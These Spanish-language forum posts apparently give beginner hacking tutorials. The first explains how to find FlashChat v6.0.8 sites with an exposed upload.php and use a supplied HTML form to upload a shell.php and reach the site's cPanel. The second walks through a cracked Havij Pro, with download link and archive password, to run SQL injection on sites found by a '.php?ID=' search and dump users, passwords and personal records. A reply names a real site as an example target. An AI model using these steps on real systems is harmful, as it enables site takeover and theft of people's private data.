Mensajes

NO SOY EL DESCUBRIDOR DE ESTO, SIMPLEMENTE QUIERO APORTARLO.

1- Bueno para empezar hay que entrar en alguna pagina de FlashChat v6 0 8 y añadirle a la pagina el /upload.php , ejemplo: pagina.com/upload.php, si da una pagina en blanco con algun mensaje en texto, significa que es vulnerable.

2- Ya que tengamos la pagina vulnerable, creamos un archivo de texto con el siguiente codigo:
<form action="http://pagina.com/upload.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="Submit">
</form>
Donde dice "action=" ahi ponemos la pagina vulnerable, lo guardamos con la extension .html.

3- Estando en la pagina vulnerable ejecutamos el archivo creado, y de ahi, subimos nuestro shell.php y ya podriamos logear en el cpanel.

Bueno eso fue todo, cualquier duda o consulta ya saben, consulten, suerte!
By andygrimm

Es mi primer post y la verdad ni idea de donde ponerlo, si esta mal muevanlo, gracias.


---------------------------------------------------------------------------------------------------
Hoy les vengo a traer algo viejo pero a la vez nuevo para algunos, esta herramienta llamada "Havij" que se basa en penetrar en la seguridad de la mal escritura del lenguaje mysql de las paginas, permitiendo penetrar en la tabla de datos dejando leer informacion valiosa como: usuarios, passwords, admins, direcciones, numero de documento, correos, telefonos, etc, todo lo guardado en la pagina.
---------------------------------------------------------------------------------------------------

1- Bueno, lo primero es descargar la version pro de Havij desde este link subido por mi:(recuerdo que es portable)
http://www.mediafire.com/download/99clems35u98bsa/Havij+Pro+%28portable%29+andygrimm.rar
SI EL RAR PIDE CONTRASEÑA ES: elhacker.net
TiP; Poner en google .php?ID= y les apareceran todas las paginas que terminen de esa forma, y vayan probando en cuales sirve y cuales no.

2- Ya descargado abrimos el loader.exe para tener la version full.

3- Ya con la pagina que queramos atacar la pegamos donde dice TARGET y le damos al boton de la derecha que dice "analyze", y veran que empieza a analizar la web abajo a la izquierda. Si dice "injection type integrer" quiere decir que pudo atacarla y podran sacarle algo de informacion.

4- Cuando vean que dice "i'm idle" quiere decir que ya termino de analizarla, ahora vamos a donde dice "tables", marcamos la tilde en el dbserver de la columna izquierda y ponen "get tables".

5- Despues que hayan hecho lo de "get tables" seleccionamos las tablas que nos interesan y presionamos donde dice "Get columns"

6- Y ahora lo mismo, a lo que les interesa le ponen la tilde y ponen "get data" y a la derecha les saldra la informacion de lo que hayan seleccionado.

Buen creo que eso es todo, suerte, y hasta la proxima, saludos !
By andygrimm

Bueno lo que pasa es que intento sacar el login del panel de control de una
pagina y no entiendo mucho del programa Havij, cuando pongo el link no me deja ya que termina en .com .cl

el tema es que havij trabaja con paginas que tengan secciones .php?id=x ; (x =numero) por ejemplo esta web: http://www.karmafilms.es/ficha_cine.php?ID=164, igual no TODAS son vulnerables ya que no todas tienen errores en mysql, suerte!